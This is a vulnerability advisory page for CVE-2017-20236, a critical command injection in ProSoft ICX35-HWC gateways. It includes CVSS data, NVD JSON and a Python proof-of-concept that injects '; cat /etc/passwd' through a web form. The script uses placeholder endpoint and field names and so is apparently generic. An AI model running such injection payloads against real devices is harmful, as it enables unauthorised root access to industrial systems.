Security Vulnerability Report
中文
CVE-2017-20236 CVSS 9.8 CRITICAL

CVE-2017-20236

Published: 2026-04-03 23:17:00
Last Modified: 2026-04-22 15:12:31
Source: [email protected]

Description

ProSoft Technology ICX35-HWC versions 1.3 and prior cellular gateways contain an input validation vulnerability in the web user interface that allows remote attackers to inject and execute system commands by submitting malicious input through unvalidated fields. Attackers can exploit this vulnerability to gain root privileges and execute arbitrary commands on the device through the accessible web interface.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:prosoft-technology:icx35-hwc_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:prosoft-technology:icx35-hwc:-:*:*:*:*:*:*:* - NOT VULNERABLE
ProSoft Technology ICX35-HWC <= 1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Example) target_url = "http://<TARGET_IP>/cgi-bin/poc_endpoint" # Malicious payload to inject commands # Using semicolon to chain commands payload = "; cat /etc/passwd" data = { "vulnerable_field": "normal_value", "config_param": payload } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } try: # Sending the malicious request response = requests.post(target_url, data=data, headers=headers, timeout=10) # Checking if the command execution was successful if response.status_code == 200 and "root:" in response.text: print("[+] Exploit successful! Command executed.") print("[+] Response:") print(response.text) else: print("[-] Exploit failed or target not vulnerable.") print("[-] Status Code:", response.status_code) print("[-] Response:", response.text[:200]) except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2017-20236", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:00.447", "lastModified": "2026-04-22T15:12:31.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ProSoft Technology ICX35-HWC versions 1.3 and prior cellular gateways contain an input validation vulnerability in the web user interface that allows remote attackers to inject and execute system commands by submitting malicious input through unvalidated fields. Attackers can exploit this vulnerability to gain root privileges and execute arbitrary commands on the device through the accessible web interface."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:prosoft-technology:icx35-hwc_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3", "matchCriteriaId": "C7FA4216-43D5-4852-832D-C23F61B76819"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:prosoft-technology:icx35-hwc:-:*:*:*:*:*:*:*", "matchCriteriaId": "689096DB-C605-41AD-B508-6AA0CA4FCB2A"}]}]}], "references": [{"url": "https://assets.belden.com/m/1116a05ab702b2ba/original/Security-Bulletin-User-Interface-ProSoft-ICX35-BSECV-2017-10.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/prosoft-technology-icx35-hwc-command-injection-via-web-interface", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.